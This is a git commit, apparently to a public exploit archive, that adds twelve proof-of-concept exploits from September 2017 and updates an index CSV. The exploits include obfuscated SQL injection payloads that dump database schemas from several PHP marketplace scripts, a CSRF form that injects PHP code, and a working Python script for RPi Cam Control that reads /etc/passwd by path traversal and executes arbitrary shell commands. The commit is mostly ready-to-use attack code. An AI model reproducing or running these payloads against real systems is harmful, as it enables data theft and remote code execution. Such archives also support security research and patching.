DB: 2017-09-11

11 new exploits Just Dial Marketplace Script - Authentication Bypass Just Dial Marketplace - Authentication Bypass Online Print Business 1.0 - SQL Injection Escort Marketplace 1.0 - SQL Injection Babysitter Website Script 1.0 - SQL Injection Job Board Software 1.0 - SQL Injection RPi Cam Control <= 6.3.14 - Multiple Vulnerabilities Just Dial Marketplace 1.0 - SQL Injection Professional Service Booking 1.0 - SQL Injection Restaurant Website Script 1.0 - SQL Injection Law Firm 1.0 - SQL Injection Topsites Script 1.0 - Cross-Site Request Forgery / PHP Code Injection My Builder Marketplace 1.0 - SQL Injection
2017-09-11 05:01:21 +00:00 · 2017-09-11 05:01:21 +00:00 · 7744909119
commit 7744909119
parent eabeaa97ef
12 changed files with 390 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -37613,7 +37613,7 @@ id,file,description,date,author,platform,type,port
 41040,platforms/linux/webapps/41040.txt,"Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution",2017-01-13,"Ozer Goker",linux,webapps,0
 41043,platforms/php/webapps/41043.txt,"My Private Tutor Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
 41044,platforms/php/webapps/41044.txt,"Hindu Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
-41045,platforms/php/webapps/41045.txt,"Just Dial Marketplace Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
+41045,platforms/php/webapps/41045.txt,"Just Dial Marketplace - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
 41046,platforms/php/webapps/41046.txt,"Entrepreneur Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",php,webapps,0
 41047,platforms/php/webapps/41047.txt,"Open Source Real-Estate Script - SQL Injection",2017-01-13,"Ihsan Sencan",php,webapps,0
 41048,platforms/php/webapps/41048.txt,"Inout StickBoard 1.0 Script - Improper Access Restrictions",2017-01-13,"Ihsan Sencan",php,webapps,0
@ -38068,6 +38068,7 @@ id,file,description,date,author,platform,type,port
 42545,platforms/php/webapps/42545.txt,"Matrimonial Script - SQL Injection",2017-08-22,"Ihsan Sencan",php,webapps,0
 42453,platforms/windows/webapps/42453.txt,"Quali CloudShell 7.1.0.6508 (Patch 6) - Persistent Cross-Site Scripting",2017-08-14,"Benjamin Lee",windows,webapps,0
 42621,platforms/php/webapps/42621.html,"Advertiz PHP Script 0.2 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",php,webapps,0
+42640,platforms/php/webapps/42640.txt,"Online Print Business 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
 42544,platforms/java/webapps/42544.py,"Automated Logic WebCTRL 6.5 - Unrestricted File Upload / Remote Code Execution",2017-08-22,LiquidWorm,java,webapps,0
 41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
 41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
@ -38309,6 +38310,7 @@ id,file,description,date,author,platform,type,port
 42419,platforms/php/webapps/42419.txt,"Premium Servers List Tracker 1.0 - SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
 42420,platforms/php/webapps/42420.txt,"EDUMOD Pro 1.3 - SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
 42421,platforms/php/webapps/42421.txt,"Muviko 1.0 - 'q' Parameter SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
+42635,platforms/php/webapps/42635.txt,"Escort Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
 42423,platforms/php/webapps/42423.txt,"Joomla! Component StreetGuessr Game 1.1.8 - SQL Injection",2017-08-03,"Ihsan Sencan",php,webapps,0
 42427,platforms/hardware/webapps/42427.html,"Technicolor TC7337 - 'SSID' Persistent Cross-Site Scripting",2017-08-03,"Geolado giolado",hardware,webapps,0
 42431,platforms/php/webapps/42431.txt,"WordPress Plugin Easy Modal 2.0.17 - SQL Injection",2017-08-07,defensecode,php,webapps,80
@ -38416,3 +38418,12 @@ id,file,description,date,author,platform,type,port
 42632,platforms/php/webapps/42632.txt,"EzInvoice 6.02 - SQL Injection",2017-09-07,"Ihsan Sencan",php,webapps,0
 42633,platforms/hardware/webapps/42633.txt,"Roteador Wireless Intelbras WRN150 - Cross-Site Scripting",2017-09-07,"Elber Tavares",hardware,webapps,0
 42634,platforms/hardware/webapps/42634.txt,"Huawei HG255s - Directory Traversal",2017-09-07,"Ahmet Mersin",hardware,webapps,0
+42636,platforms/php/webapps/42636.txt,"Babysitter Website Script 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
+42637,platforms/php/webapps/42637.txt,"Job Board Software 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
+42638,platforms/php/webapps/42638.py,"RPi Cam Control <= 6.3.14 - Multiple Vulnerabilities",2017-08-16,"Alexander Korznikov",php,webapps,0
+42639,platforms/php/webapps/42639.txt,"Just Dial Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
+42641,platforms/php/webapps/42641.txt,"Professional Service Booking 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
+42642,platforms/php/webapps/42642.txt,"Restaurant Website Script 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
+42643,platforms/php/webapps/42643.txt,"Law Firm 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
+42644,platforms/php/webapps/42644.html,"Topsites Script 1.0 - Cross-Site Request Forgery / PHP Code Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
+42645,platforms/php/webapps/42645.txt,"My Builder Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
--- a/platforms/php/webapps/42635.txt
+++ b/platforms/php/webapps/42635.txt
@ -0,0 +1,29 @@
+# # # # # 
+# Exploit Title: Escort Website Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 09.09.2017
+# Vendor Homepage: http://scriptzee.com/
+# Software Link: http://scriptzee.com/escort-website
+# Demo: http://escortwebsite.scriptzee.com/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/prof_detils.html?escort=[SQL]
+# 
+# -1418820035'+/*!11112UnIoN*/+(/*!11112SelEcT*/0x283129,0x283229,0x283329,0x283429,(Select+export_set(5,@:=0,(/*!11112SelEcT*/+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629)--+-
+# 
+# http://localhost/[PATH]/ajax_rating.php?escort=[SQL]
+# 
+# Etc..
+# # # # #
--- a/platforms/php/webapps/42636.txt
+++ b/platforms/php/webapps/42636.txt
@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Babysitter Website Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 09.09.2017
+# Vendor Homepage: http://scriptzee.com/
+# Software Link: http://scriptzee.com/best-softwares/babysitter-website
+# Demo: http://babysitter.scriptzee.com/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/taskers?skills=[SQL]
+# 
+# 63'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+1=1='
+# 
+# Etc..
+# # # # #
--- a/platforms/php/webapps/42637.txt
+++ b/platforms/php/webapps/42637.txt
@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: Job Board Software 1.0 - SQL Injection
+# Dork: N/A
+# Date: 09.09.2017
+# Vendor Homepage: http://scriptzee.com/
+# Software Link: http://scriptzee.com/best-softwares/job-board-software
+# Demo: http://jobsite.scriptzee.com/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/job-details/[SQL]/eFe
+# 
+# -131'+/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283229,0x283329,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229)--+-/eFe
+# 
+# Etc..
+# # # # #
--- a/platforms/php/webapps/42638.py
+++ b/platforms/php/webapps/42638.py
@ -0,0 +1,71 @@
+#####
+# Exploit Title: RPi Cam Control <= v6.3.14 (RCE) Multiple Vulnerabilities - preview.php
+# Date: 16/08/2017
+# Exploit Author: Alexander Korznikov
+# Vendor Homepage: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
+# Software Link: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
+# Version: <= v6.3.14
+# Date 16/08/2017
+#
+# A web interface for the RPi Cam
+# Vendor github: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
+#
+# Bug Discovered by Alexander Korznikov:
+#     www.exploit-db.com/author/?a=8722
+#     www.linkedin.com/in/nopernik
+#     www.korznikov.com
+#
+# RPi Cam Control <= v6.3.14 is vulnerable to Local File Read and Blind Command Injection.
+#
+#
+# Local File Read (get /etc/passwd file):
+# ----------------
+# POST /preview.php HTTP/1.1
+# Host: 127.0.0.1
+# Content-Type: application/x-www-form-urlencoded
+# Connection: close
+# Content-Length: 80
+#
+# download1=../../../../../../../../../../../../../../../../etc/passwd.v0000.t
+#
+#
+# Blind Command Injection:
+# ------------------
+# POST /preview.php HTTP/1.1
+# Host: 127.0.0.1
+# Content-Type: application/x-www-form-urlencoded
+# Connection: close
+# Content-Length: 52
+#
+# convert=none&convertCmd=$(COMMAND_TO_EXECUTE)
+#
+#
+# Blind Command Injection can be used with Local File Read to properly get the output of injected command.
+#
+# Proof of Concept Code:
+#####
+
+#!/usr/bin/python
+
+import requests
+import sys
+if not len(sys.argv[2:]):
+   print "Usage: RPi-Cam-Control-RCE.py 127.0.0.1 'cat /etc/passwd'"
+   exit(1)
+
+def GET(target, rfile):
+   res = requests.post("http://%s/preview.php" % target,
+        headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
+        data={"download1": "../../../../../../../../../../../../../../../../{}.v0000.t".format(rfile)})
+   return res.content
+
+def RCE(target, command):
+   requests.post("http://%s/preview.php" % target,
+        headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
+        data={"convert": "none", "convertCmd": "$(%s > /tmp/output.txt)" % command})
+   return GET(target,'/tmp/output.txt')
+
+target = sys.argv[1]
+command = sys.argv[2]
+
+print RCE(target,command)
--- a/platforms/php/webapps/42639.txt
+++ b/platforms/php/webapps/42639.txt
@ -0,0 +1,26 @@
+# # # # # 
+# Exploit Title: Just Dial Marketplace Software 1.0 - SQL Injection
+# Dork: N/A
+# Date: 09.09.2017
+# Vendor Homepage: http://scriptzee.com/
+# Software Link: http://scriptzee.com/best-softwares/just-dial-marketplace
+# Demo: http://classified.scriptzee.com/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/result/[SQL]/eFe
+# http://localhost/[PATH]/business/[SQL]/eFe
+# 
+# Etc..
+# # # # #
--- a/platforms/php/webapps/42640.txt
+++ b/platforms/php/webapps/42640.txt
@ -0,0 +1,29 @@
+# # # # # 
+# Exploit Title: Online Print Business Software 1.0 - SQL Injection
+# Dork: N/A
+# Date: 09.09.2017
+# Vendor Homepage: http://scriptzee.com/
+# Software Link: http://scriptzee.com/best-softwares/online-print-business
+# Demo: http://onlineprintbssiness.scriptzee.com/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/product-decs.php?cat_id=[SQL]
+# 
+# -149++/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x28323729,0x28323829,0x28323929)--+-
+# 
+# http://localhost/[PATH]/info.php?page=[SQL]
+# 
+# Etc..
+# # # # #
--- a/platforms/php/webapps/42641.txt
+++ b/platforms/php/webapps/42641.txt
@ -0,0 +1,33 @@
+# # # # # 
+# Exploit Title: Professional Service Booking Software 1.0 - SQL Injection
+# Dork: N/A
+# Date: 09.09.2017
+# Vendor Homepage: http://scriptzee.com/
+# Software Link: http://scriptzee.com/best-softwares/professional-service-booking-engine
+# Demo: http://professionalservice.scriptzee.com/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/content.php?page=[SQL]
+# 
+# -7+/*!50000UniOn*/+/*!50000SelECt*/+0x496873616e2053656e63616e,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))--+---+-
+# 
+# http://localhost/[PATH]/best_pro_details.php?service_id=[SQL]
+# 
+# -54'++/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283229,0x283329,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929)--+-
+# 
+# http://localhost/[PATH]/alllikes.php?service_id=[SQL]
+# 
+# Etc..
+# # # # #
--- a/platforms/php/webapps/42642.txt
+++ b/platforms/php/webapps/42642.txt
@ -0,0 +1,29 @@
+# # # # # 
+# Exploit Title: Restaurant Website Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 09.09.2017
+# Vendor Homepage: http://scriptzee.com/
+# Software Link: http://scriptzee.com/small-business/restaurant-website-script
+# Demo: http://restaurant.scriptzee.com/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/cms.php?id=[SQL]
+# 
+# -6'++/*!00002UNION*/+/*!00002SELECT*/+0x31,0x32,0x33,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,19,20,0x3231,0x3232--+-
+# 
+# http://localhost/[PATH]/contact.php?id=[SQL]
+# 
+# Etc..
+# # # # #
--- a/platforms/php/webapps/42643.txt
+++ b/platforms/php/webapps/42643.txt
@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: Law Firm Website Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 09.09.2017
+# Vendor Homepage: http://scriptzee.com/
+# Software Link: http://scriptzee.com/small-business/law-firm-website
+# Demo: http://lawwebsite.scriptzee.com/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/business-searchlist?country=[SQL]&state=[SQL]&city=[SQL]&farm_cat=[SQL]
+# 
+# Etc..
+# # # # #
--- a/platforms/php/webapps/42644.html
+++ b/platforms/php/webapps/42644.html
@ -0,0 +1,57 @@
+<!--
+# # # # # 
+# Exploit Title: jRank - Topsites Script 1.0 - Cross-Site Request Forgery
+# Dork: N/A
+# Date: 10.09.2017
+# Vendor Homepage: https://topsitesscript.com/
+# Software Link: https://topsitesscript.com/topsites-script-demo/
+# Demo: http://www.topsitesscript.com/demo/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+-->
+<form action="http://localhost/[PATH]/admin/headerfooter.php" method="post">
+<input name="action" value="edit" type="hidden">
+<table width="95%" cellspacing="1" cellpadding="3" border="0" align="center">
+<tbody>
+<tr bgcolor="#3498DB">
+<td><b style="color:#FFFFFF;">Meta Tags File</b></td>
+</tr>
+<tr bgcolor="#FFFFFF">
+<td>
+<textarea cols="10" rows="2" name="meta" style="width: 100%">
+<!-- 
+Html Code etc.....
+-->
+</textarea>
+</td>
+</tr>
+</tbody>
+</table>
+<table width="95%" cellspacing="1" cellpadding="3" border="0" align="center">
+<tbody>
+<tr bgcolor="#3498DB">
+<td><b style="color:#FFFFFF;">Footer File</b></td>
+</tr>
+<tr bgcolor="#FFFFFF">
+<td><textarea cols="60" rows="7" name="footer" style="width: 100%">
+<!--
+Php Code etc.....
+-->
+</textarea>
+</td>
+</tr>
+<tr bgcolor="#FFFFFF">
+<td>
+<font face="verdana" size="2"><center><input name="submit" value="Edit" type="submit"></center></font>
+</td>
+</tr>
+</tbody>
+</table>
+</form>
--- a/platforms/php/webapps/42645.txt
+++ b/platforms/php/webapps/42645.txt
@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: My Builder Marketplace Script 1.0 - SQL Injection
+# Dork: N/A
+# Date: 09.09.2017
+# Vendor Homepage: http://scriptzee.com/
+# Software Link: http://scriptzee.com/best-softwares/my-builder-marketplace
+# Demo: http://mybuilderjobs.scriptzee.com/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/marketplace?start_date=[SQL]
+# 
+# Etc..
+# # # # #